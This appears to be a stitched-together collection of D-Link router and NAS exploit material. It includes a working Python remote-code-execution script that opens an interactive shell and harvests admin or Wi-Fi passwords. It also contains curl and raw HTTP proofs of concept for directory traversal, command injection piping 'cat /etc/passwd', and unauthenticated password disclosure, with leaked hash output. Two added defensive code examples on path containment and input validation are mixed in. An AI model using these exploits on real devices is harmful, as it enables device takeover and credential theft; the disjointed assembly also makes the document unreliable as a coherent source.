The following products are affected:
D-Link DNS-320 ShareCenter
D-Link DNS-325 ShareCenter
http://www.example.com/cgi-bin/system_mgr.cgi?cmd=cgi_sms_test&command1=ls
http://www.example.com/cgi-bin/discovery.cgi
http://www.example.com/cgi-bin/system_mgr.cgi?cmd=get_firm_v_xml
#!/usr/bin/python
# Exploit Title: D-Link WAP 615/645/815 < 1.03 service.cgi RCE
# Exploit Author: Cr0n1c
# Vendor Homepage: us.dlink.com
# Software Link: https://github.com/Cr0n1c/dlink_shell_poc/blob/master/dlink_auth_rce
# Version: 1.03
# Tested on: D-Link 815 v1.03
import argparse
import httplib
import random
import re
import requests
import string
import urllib2

DLINK_REGEX = ['Product Page : <a href="http://support.dlink.com" target="_blank">(.*?)<',
               '<div class="modelname">(.*?)</div>',
               '<div class="pp">Product Page : (.*?)<a href="javascript:check_is_modified">'
               ]


def dlink_detection():
    try:
        r = requests.get(URL, timeout=10.00)
    except requests.exceptions.ConnectionError:
        print "Error: Failed to connect to " + URL
        return False

    if r.status_code != 200:
        print "Error: " + URL + " returned status code " + str(r.status_code)
        return False

    for rex in DLINK_REGEX:
        if re.search(rex, r.text):
            res = re.findall(rex, r.text)[0]
            return res

    print "Warning: Unable to detect device for " + URL
    return "Unknown Device"


def create_session():
    post_content = {"REPORT_METHOD": "xml",
                    "ACTION": "login_plaintext",
                    "USER": "admin",
                    "PASSWD": PASSWORD,
                    "CAPTCHA": ""
                    }
    try:
        r = requests.post(URL + "/session.cgi", data=post_content, headers=HEADER)
    except requests.exceptions.ConnectionError:
        print "Error: Failed to access " + URL + "/session.cgi"
        return False

    if not (r.status_code == 200 and r.reason == "OK"):
        print "Error: Did not receive a HTTP 200"
        return False

    if not re.search("<RESULT>SUCCESS</RESULT>", r.text):
        print "Error: Did not get a success code"
        return False

    return True


def parse_results(result):
    print result[100:]
    return result


def send_post(command, print_res=True):
    post_content = "EVENT=CHECKFW%26" + command + "%26"
    method = "POST"

    if URL.lower().startswith("https"):
        handler = urllib2.HTTPSHandler()
    else:
        handler = urllib2.HTTPHandler()

    opener = urllib2.build_opener(handler)
    request = urllib2.Request(URL + "/service.cgi", data=post_content, headers=HEADER)
    request.get_method = lambda: method

    try:
        connection = opener.open(request)
    except urllib2.HTTPError:
        print "Error: failed to connect to " + URL + "/service.cgi"
        return False
    except urllib2.URLError:  # covers TLS/transport failures; urllib2 has no HTTPSError
        print "Error: failed to connect to " + URL + "/service.cgi"
        return False

    if not connection.code == 200:
        print "Error: Received status code " + str(connection.code)
        return False

    # The device answers with chunked output that sometimes ends early; retry the read
    attempts = 0
    while attempts < 5:
        try:
            data = connection.read()
        except httplib.IncompleteRead:
            attempts += 1
        else:
            break

    if attempts == 5:
        print "Error: Chunking failed %d times, bailing." % attempts
        return False

    if print_res:
        return parse_results(data)
    else:
        return data


def start_shell():
    print "+" + "-" * 80 + "+"
    print "| Welcome to D-Link Shell" + (" " * 56) + "|"
    print "+" + "-" * 80 + "+"
    print "| This is a limited shell that exploits piss poor programming. I created this |"
    print "| to give you a comfort zone and to emulate a real shell environment. You will |"
    print "| be limited to basic busybox commands. Good luck and happy hunting. |"
    print "|" + (" " * 80) + "|"
    print "| To quit type 'gtfo'" + (" " * 60) + "|"
    print "+" + "-" * 80 + "+\n\n"

    cmd = ""
    while True:
        cmd = raw_input(ROUTER_TYPE + "# ").strip()
        if cmd.lower() == "gtfo":
            break
        send_post(cmd)


def query_getcfg(param):
    post_data = {"SERVICES": param}
    try:
        r = requests.post(URL + "/getcfg.php", data=post_data, headers=HEADER)
    except requests.exceptions.ConnectionError:
        print "Error: Failed to access " + URL + "/getcfg.php"
        return False

    if not (r.status_code == 200 and r.reason == "OK"):
        print "Error: Did not receive a HTTP 200"
        return False

    if re.search("<message>Not authorized</message>", r.text):
        print "Error: Not vulnerable"
        return False

    return r.text


def attempt_password_find():
    # Going fishing in DEVICE.ACCOUNT looking for CWE-200 or no password
    data = query_getcfg("DEVICE.ACCOUNT")
    if not data:
        return False

    res = re.findall("<password>(.*?)</password>", data)
    # findall returns a list, so compare the first match, not the list itself
    if len(res) > 0 and res[0] != "=OoXxGgYy=":
        return res[0]

    # Did not find it in first attempt
    data = query_getcfg("WIFI")
    if not data:
        return False

    res = re.findall("<key>(.*?)</key>", data)
    if len(res) > 0:
        return res[0]

    # All attempts failed, just going to return and wish best of luck!
    return False


if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="D-Link 615/815 Service.cgi RCE")
    parser.add_argument("-p", "--password", dest="password", action="store", default=None,
                        help="Password for the router. If not supplied then will use blank password.")
    parser.add_argument("-u", "--url", dest="url", action="store", required=True,
                        help="[Required] URL for router (i.e. http://10.1.1.1:8080)")
    parser.add_argument("-x", "--attempt-exploit", dest="attempt_exploit", action="store_true", default=False,
                        help="If flag is set, will attempt CWE-200. If that fails, then will attempt to discover "
                             "wifi password and use it.")
    args = parser.parse_args()

    HEADER = {"Cookie": "uid=" + "".join(random.choice(string.letters) for _ in range(10)),
              "Host": "localhost",
              "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8"
              }

    URL = args.url.lower().strip()
    if not URL.startswith("http"):
        URL = "http://" + URL

    ROUTER_TYPE = dlink_detection()
    if not ROUTER_TYPE:
        print "EXITING . . ."
        exit()

    if args.attempt_exploit and args.password is None:
        res = attempt_password_find()
        if res:
            PASSWORD = res
        else:
            PASSWORD = ""
        print "[+] Switching password to: " + PASSWORD
    elif args.password:
        PASSWORD = args.password
    else:
        PASSWORD = ""

    if not create_session():
        print "EXITING . . ."
        exit()

    if len(send_post("ls", False)) == 0:
        print "Appears this device [%s] is not vulnerable. EXITING . . ." % ROUTER_TYPE
        exit()

    start_shell()
## Password stored in plaintext
CVE: CVE-2018-10824
Description:
An issue was discovered on D-Link routers:
DWR-116 through 1.06,
DIR-140L through 1.02,
DIR-640L through 1.02,
DWR-512 through 2.02,
DWR-712 through 2.02,
DWR-912 through 2.02,
DWR-921 through 2.02,
DWR-111 through 1.01,
and probably others with the same type of firmware.
NOTE: I have changed the filename in description to XXX because the vendor leaves some EOL routers unpatched and the attack is too simple
The administrative password is stored in plaintext in the /tmp/XXX/0 file. An attacker having a directory traversal (or LFI) can easily get full router access.
PoC using the directory traversal vulnerability disclosed above - CVE-2018-10822
`$ curl http://routerip/uir//tmp/XXX/0`
This command returns a binary config file which contains admin username and password as well as many other router configuration settings. By using the directory traversal vulnerability it is possible to read the file without authentication.
## Directory Traversal
CVE: CVE-2018-10822
CVSS v3: 8.6
AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
Description: Directory traversal vulnerability in the web interface on D-Link routers:
DWR-116 through 1.06,
DIR-140L through 1.02,
DIR-640L through 1.02,
DWR-512 through 2.02,
DWR-712 through 2.02,
DWR-912 through 2.02,
DWR-921 through 2.02,
DWR-111 through 1.01,
and probably others with the same type of firmware
allows remote attackers to read arbitrary files via a /.. or // after "GET /uir" in an HTTP request.
NOTE: this vulnerability exists because of an incorrect fix for CVE-2017-6190.
PoC:
`$ curl http://routerip/uir//etc/passwd`
The vulnerability can be used to retrieve the administrative password using the other disclosed vulnerability - CVE-2018-10824.
This vulnerability was reported previously by Patryk Bogdan as CVE-2017-6190. He reported it as fixed in a certain release, but unfortunately it is still present in even newer releases. The vulnerability is also present in other D-Link routers and can be exploited not only (as the original author stated) via a double dot, but also via an absolute path introduced by a double slash.
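The two PoC paths above illustrate why a fix that only refuses `..` is incomplete: after the `/uir/` prefix is stripped, `//etc/passwd` leaves an absolute remainder that a path join silently honours. The following is an added example (not D-Link's code or the advisory's PoC) that models that incomplete fix beside a containment check which normalizes first and then verifies the result is still under the served directory, and flags both request shapes in constructed access-log lines. The `/www/uir` root and the handler logic are assumptions used to model the bug class, not the device's real layout.

```python
"""Path-containment check and access-log triage for the /uir traversal (added example)."""
import posixpath
import re
from urllib.parse import unquote

# Assumed layout: the /uir handler serves files below this directory.
UIR_ROOT = "/www/uir"
PREFIX = "/uir/"


def _remainder(request_path):
    """Part of the (already URL-decoded) request path after '/uir/'."""
    if not request_path.startswith(PREFIX):
        return None
    return request_path[len(PREFIX):]


def resolve_blocklist(request_path):
    """Model of an incomplete fix: refuse '..' and join whatever is left.

    '/uir/../../etc/passwd' is refused, but '/uir//etc/passwd' leaves the
    absolute remainder '/etc/passwd', and posixpath.join discards the root
    when its second argument is absolute. Returns the path that would be
    opened, or None if refused.
    """
    rest = _remainder(request_path)
    if rest is None or ".." in rest:
        return None
    return posixpath.normpath(posixpath.join(UIR_ROOT, rest))


def resolve_contained(request_path):
    """Normalize first, then prove the result is still under UIR_ROOT.

    Dot segments, leading slashes and mixtures all collapse to one normalized
    form, so a single containment test covers every variant. On a live system
    resolve symlinks (os.path.realpath) before the comparison as well.
    """
    rest = _remainder(request_path)
    if rest is None:
        return None
    candidate = posixpath.normpath(posixpath.join(UIR_ROOT, rest))
    if candidate == UIR_ROOT or candidate.startswith(UIR_ROOT + "/"):
        return candidate
    return None


# Detection: a '/..' segment or a '//' directly after '/uir', the two forms
# named in the advisory. The target is URL-decoded before matching.
_UIR_TRAVERSAL = re.compile(r"/uir(/\.\.(/|$)|//)", re.IGNORECASE)
_REQUEST_TARGET = re.compile(r'"(?:GET|POST|HEAD) (\S+)')


def flag_uir_requests(log_lines):
    """Return the request targets in common-log-format lines that look like /uir traversal."""
    hits = []
    for line in log_lines:
        m = _REQUEST_TARGET.search(line)
        if m and _UIR_TRAVERSAL.search(unquote(m.group(1))):
            hits.append(m.group(1))
    return hits


# Constructed sample log lines (not captured from a real device).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2018:10:00:00 +0000] "GET /uir/index.htm HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2018:10:00:01 +0000] "GET /uir//etc/passwd HTTP/1.1" 200 301',
    '10.0.0.9 - - [01/Jan/2018:10:00:02 +0000] "GET /uir/../../etc/passwd HTTP/1.1" 404 0',
    '10.0.0.7 - - [01/Jan/2018:10:00:03 +0000] "GET /uir//tmp/XXX/0 HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for p in ("/uir/index.htm", "/uir/../../etc/passwd", "/uir//etc/passwd"):
        print("%-24s blocklist=%-20s contained=%s" % (p, resolve_blocklist(p), resolve_contained(p)))
    print("flagged:", flag_uir_requests(SAMPLE_LOG))
```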
## Shell command injection
CVE: CVE-2018-10823
CVSS v3: 9.1
AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
Description: An issue was discovered on D-Link routers:
DWR-116 through 1.06,
DWR-512 through 2.02,
DWR-712 through 2.02,
DWR-912 through 2.02,
DWR-921 through 2.02,
DWR-111 through 1.01,
and probably others with the same type of firmware.
An authenticated attacker may execute arbitrary code by injecting a shell command into the Sip parameter of the chkisg.htm page. This allows full control over the device internals.
PoC:
Login to the router.
Request the following URL after login:
`$ curl http://routerip/chkisg.htm%3FSip%3D1.1.1.1%20%7C%20cat%20%2Fetc%2Fpasswd`
See the passwd file contents in the response.
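Both ping-style injection points on this page (the NCC `ping_addr` value built as `$(cmd)` and the `chkisg.htm` `Sip` parameter) share one root cause: attacker input spliced into a shell command string. The following is an added example (not vendor code) of the standard mitigation: accept only a literal IP address or a plain hostname, and hand the result to the ping binary as an argv list so shell metacharacters are never interpreted. The option-like hostname check (rejecting labels that begin with `-`) is included because argv passing alone does not stop argument injection.

```python
"""Validation and argv construction for a ping target taken from a web parameter (added example)."""
import ipaddress


class BadTarget(ValueError):
    """Raised when a ping target is neither an IP address nor a plain hostname."""


def _valid_label(label):
    # RFC 1123 label, simplified: 1..63 chars, letters/digits/hyphen, no leading
    # or trailing hyphen. The leading-hyphen rule also blocks option injection
    # such as '-c' being parsed by ping as a flag.
    if not label or len(label) > 63:
        return False
    if label.startswith("-") or label.endswith("-"):
        return False
    return label.replace("-", "").isalnum()


def validate_target(value):
    """Return a canonical IP string or the hostname; raise BadTarget otherwise.

    Anything that is not a bare address or hostname (spaces, pipes, '$(', quotes,
    empty labels) fails closed. The caller never forwards the raw input.
    """
    value = value.strip()
    try:
        return str(ipaddress.ip_address(value))  # canonical form, e.g. IPv6 compression
    except ValueError:
        pass
    if 1 <= len(value) <= 253 and all(_valid_label(l) for l in value.split(".")):
        return value
    raise BadTarget("not an IP address or hostname: %r" % value)


def legacy_shell_string(value):
    """The vulnerable pattern, kept for contrast: input concatenated into a shell line.

    Passed to 'sh -c', a value such as '1.1.1.1 | cat /etc/passwd' runs the
    second command. Never execute this; it exists to show what ping_argv replaces.
    """
    return "ping -c 3 " + value


def ping_argv(value, count=3):
    """Build the ping command as an argv list for subprocess.run(argv) with shell=False.

    With no shell involved, characters like '|', ';' and '$(' in the target are
    inert, and validate_target has already reduced the target to an address or
    hostname anyway.
    """
    target = validate_target(value)
    return ["ping", "-c", str(count), target]


if __name__ == "__main__":
    for candidate in ("1.1.1.1", "router.lan", "1.1.1.1 | cat /etc/passwd", "$(ls)", "-c"):
        try:
            print("%-28s -> %s" % (candidate, ping_argv(candidate)))
        except BadTarget as exc:
            print("%-28s -> rejected (%s)" % (candidate, exc))
```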
D-Link DWR-932 Firmware <= V4.00 Authentication Bypass - Password Disclosure
Author: Saeed reza Zamanian [penetrationtest @ Linkedin]
Product: D-Link DWR-932
Tested Version: Firmware V4.00(EU)b03
Vendor: D-Link http://www.dlink.com/
Product URL: http://www.dlink.com/uk/en/home-solutions/work/personal-hotspots/dwr-932-4g-lte-mobile-wi-fi-hotspot-150-mbps
Date: 20 Mar 2016
About Product:
---------------
The DWR-932 4G LTE Mobile Wi-Fi Hotspot 150 Mbps is a 4G/LTE Cat4 high speed broadband Wi-Fi mobile hotspot. The DWR-932 uses a 4G Internet connection to give you a simple and fast Wi-Fi network anywhere you need.
Vulnerability Details:
----------------------
The CGI script "/cgi-bin/dget.cgi" handles most of the user-side and server-side requests, but requests received from unauthorized users are not checked,
so an attacker is able to view the administrative or Wi-Fi password in clear text by visiting the URLs below.
View Admin Username and Password:
http://192.168.0.1/cgi-bin/dget.cgi?cmd=DEVICE_web_usrname,DEVICE_web_passwd,DEVICE_login_timeout&_=1458459188807
Output:
{ "DEVICE_web_usrname": "MyUsErNaMe", "DEVICE_web_passwd": "MyPaSsWoRd", "DEVICE_login_timeout": "600" }
View Wifi Password:
http://192.168.0.1/cgi-bin/dget.cgi?cmd=wifi_AP1_ssid,wifi_AP1_hidden,wifi_AP1_passphrase,wifi_AP1_passphrase_wep,wifi_AP1_security_mode,wifi_AP1_enable,get_mac_filter_list,get_mac_filter_switch,get_client_list,get_mac_address,get_wps_dev_pin,get_wps_mode,get_wps_enable,get_wps_current_time&_=1458458152703
Output:
{ "wifi_AP1_ssid": "dlink-DWR-932", "wifi_AP1_hidden": "0", "wifi_AP1_passphrase": "MyPaSsPhRaSe", "wifi_AP1_passphrase_wep": "", "wifi_AP1_security_mode": "3208,8", "wifi_AP1_enable": "1", "get_mac_filter_list": "", "get_mac_filter_switch": "0", "get_client_list": "9c:00:97:00:a3:b3,192.168.0.45,IT-PCs,0>40:b8:00:ab:b8:8c,192.168.0.43,android-b2e363e04fb0680d,0", "get_mac_address": "c4:00:f5:00:ec:40", "get_wps_dev_pin": "", "get_wps_mode": "0", "get_wps_enable": "0", "get_wps_current_time": "" }
Export All Configurations:
http://192.168.0.1/cgi-bin/export_cfg.cgi
#EOF
# Title: D-Link DWR-116 Arbitrary File Download
# Vendor: D-Link (www.dlink.com)
# Affected model(s): DWR-116 / DWR-116A1
# Tested on: V1.01(EU), V1.00(CP)b10, V1.05(AU)
# CVE: CVE-2017-6190
# Date: 04.07.2016
# Author: Patryk Bogdan (@patryk_bogdan)
Description:
D-Link DWR-116 with firmware before V1.05b09 suffers from a vulnerability
which leads to unauthorized file download from the device filesystem.
PoC:
HTTP Request:
GET /uir/../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1
Host: 192.168.2.1
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
HTTP Response:
HTTP/1.0 200 OK
Content-Type: application/x-none
Cache-Control: max-age=60
Connection: close
root:$1$$taUxCLWfe3rCh2ylnFWJ41:0:0:root:/root:/bin/ash
nobody:$1$$qRPK7m23GJusamGpoGLby/:99:99:nobody:/var/usb:/sbin/nologin
ftp:$1$$qRPK7m23GJusamGpoGLby/:14:50:FTP USER:/var/usb:/sbin/nologin
Fix:
Update device to the new firmware (V1.05b09)